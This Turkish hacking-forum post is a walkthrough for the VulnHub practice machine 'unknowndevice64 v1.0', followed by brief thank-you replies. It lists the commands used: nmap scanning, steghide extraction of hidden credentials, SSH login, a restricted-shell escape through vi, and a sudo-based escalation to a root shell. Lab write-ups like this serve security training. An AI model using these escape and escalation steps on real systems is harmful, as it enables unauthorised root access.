THT DUYURU

 
 
Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

Seçenekler

unknowndevice64 v1.0 VulnHub Zafiyetli Makine Çözümü // Xowly

Xowly - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
06/2019
Nereden:
ғate
Mesajlar:
725
Konular:
72
Ticaret:
(0) %
5
2441
17-01-2020 23:19
#1
unknowndevice64 v1.0: VulnHub


Merhabalar, değerli Türk Hack Team ailesi bu gün sizlere "unknowndevice64 v2.0: VulnHub Zafiyetli Makine Çözümü" konusunu anlatacağım.





unknowndevice64-v1.0







İsim: unknowndevice64 v1.0: VulnHub

Çıkış Tarihi: 9 Mar 2019

Zorluk: Başlangıç

Dosya Boyutu: 282-mb/280-mb

Açıklama: "Root Erişimini Almak"

Hedef: flag.txt

Seri: unkowndevice64








unknowndevice64 v1.0 Zafiyetli Makine Çözümü



Öncelikle zafiyetli makinemizin ip adresini öğrenebilmek için terminale netdiscover yazıyoruz.






Ardından nmap ile tarama yapıyoruz ve sonucunda iki adet "1337 ve 31337" portlarının açık olduğunu görüyoruz.


Kod:
nmap -A 192.168.204.129






Ardından "31337" portu üzerinden anasayfamıza bir göz atıyoruz.






Ardından anasayfamızda "h1dd3n" kelimemizin gizlendiğini görüyoruz. Ardından sayfamızın kaynak kodlarına göz atıyoruz.







Ardından kaynak kodlarında bulduğumuz "key_is_h1dd3n.jpg" dosyasını tarayıcımızda açıyoruz.

Daha sonrasında bilgisayarımıza bu resim dosyasını kaydediyoruz.






Ardından dosyayı kaydettiğimiz konuma geçiyoruz ve ve aşağıdaki kodu terminalimize yazıyoruz.

Kod:
steghide extract -sf key_is_h1dd3n.jpg






Ardından karşımıza bir metin dosyası çıkıyor. Aşağıdaki kod ile dosyayı okuyoruz ve çıkan metini dönüştürücüye atıyoruz.

Kod:
cat h1dd3n.txt






Ardından kullanıcı adımız ve şifremiz karşımıza çıkıyor.

Kod:
Username: ud64
Password: 1M!#[email protected]





Ardından makinemize 1337 portu ile giriş yapıyoruz ve aşağıdaki komutları yazıyoruz.

Kod:
ssh [email protected] -p 1337






Daha sonrasında sırasıyla "id, ls, echo $SHELL, echo $PATH, export SHELL=/bin/bash:$SHEL, export PATH=/usr/bin:$PATH" yazıyoruz.

Kod:
id






Kod:
ls


Kod:
echo $SHELL





Kod:
echo $PATH


Kod:
export SHELL=/bin/bash:$SHEL





Kod:
export PATH=/usr/bin:$PATH






Ardından terminale "vi" yazıyoruz.

Kod:
vi







Ardından gelen sayfada gerekli kısıma giriş yapmak için aşağıdaki kodu giriyoruz.

Kod:
:!/bin/bash






Ardından gerekli komutları yazıyoruz ve "su" izni olmadan giriş yapabileceğimizi öğreniyoruz.

Kod:
export PATH=/usr/bin:$PATH


Kod:
export SHELL=/bin/bash:$SHELL
sudo -l






Ardından sudo ile aşağıdaki kodu çalıştırıyoruz.

Kod:
sudo sysud64 -h | less






Ardından "sh" içerisinden çalıştırmamız gereken satırlar olduğundan dolayı aşağıdaki komutu yazıyoruz.

Kod:
sudo sysud64 -o /dev/null /bin/sh






Ardından sırasıyla "id, ls, cd /root, ls" yazıyoruz. Ardından flag dosyamız karşımıza çıkıyor. Dosyamızı aşağıdaki komutla okuyoruz.

Kod:
cat flag.txt







Evet Türk Hack Team ailesi konum bu kadar. Bir sonraki konumda görüşmek üzere. Esenlikler.



Konu Xowly tarafından (19-01-2020 18:35 Saat 18:35 ) değiştirilmiştir.
PourLa, P4RS, By Ghost, rewecetr Teşekkür etti.
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
19-01-2020 19:07
#2
Ellerine sağlık
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
Xowly - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
06/2019
Nereden:
ғate
Mesajlar:
725
Konular:
72
Ticaret:
(0) %
19-01-2020 20:46
#3
Alıntı:
"P4RS´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık
Teşekkür ederim hocam
By Ghost - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
07/2013
Nereden:
C:\Linux
Yaş:
24
Mesajlar:
939
Konular:
144
Teşekkür (Etti):
400
Teşekkür (Aldı):
457
Ticaret:
(0) %
20-01-2020 12:41
#4
Eline sağlık detaylı ve güzel anlatım olmuş
---------------------
Öfkene hakim olamıyorsan;
Niye yaşıyorsun?

-->Muslims Freedom!!!<--
Bugs Bunny - ait Kullanıcı Resmi (Avatar)
Senior Hunter
Üyelik tarihi:
07/2016
Nereden:
MSFVenom
Mesajlar:
1.477
Konular:
115
Teşekkür (Etti):
28
Teşekkür (Aldı):
710
Ticaret:
(0) %
20-01-2020 12:44
#5
Ellerine Sağlık Dostum
---------------------
"Ölüm, insanın değişmez kaderidir; marifet unutulmamaktır.".

Xowly - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
06/2019
Nereden:
ғate
Mesajlar:
725
Konular:
72
Ticaret:
(0) %
20-01-2020 16:40
#6
Alıntı:
Uchiha-Sasuke´isimli üyeden Alıntı Mesajı göster
Ellerine Sağlık Dostum
Alıntı:
By Ghost´isimli üyeden Alıntı Mesajı göster
Eline sağlık detaylı ve güzel anlatım olmuş
Teşekkürler Arkadaşlar

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler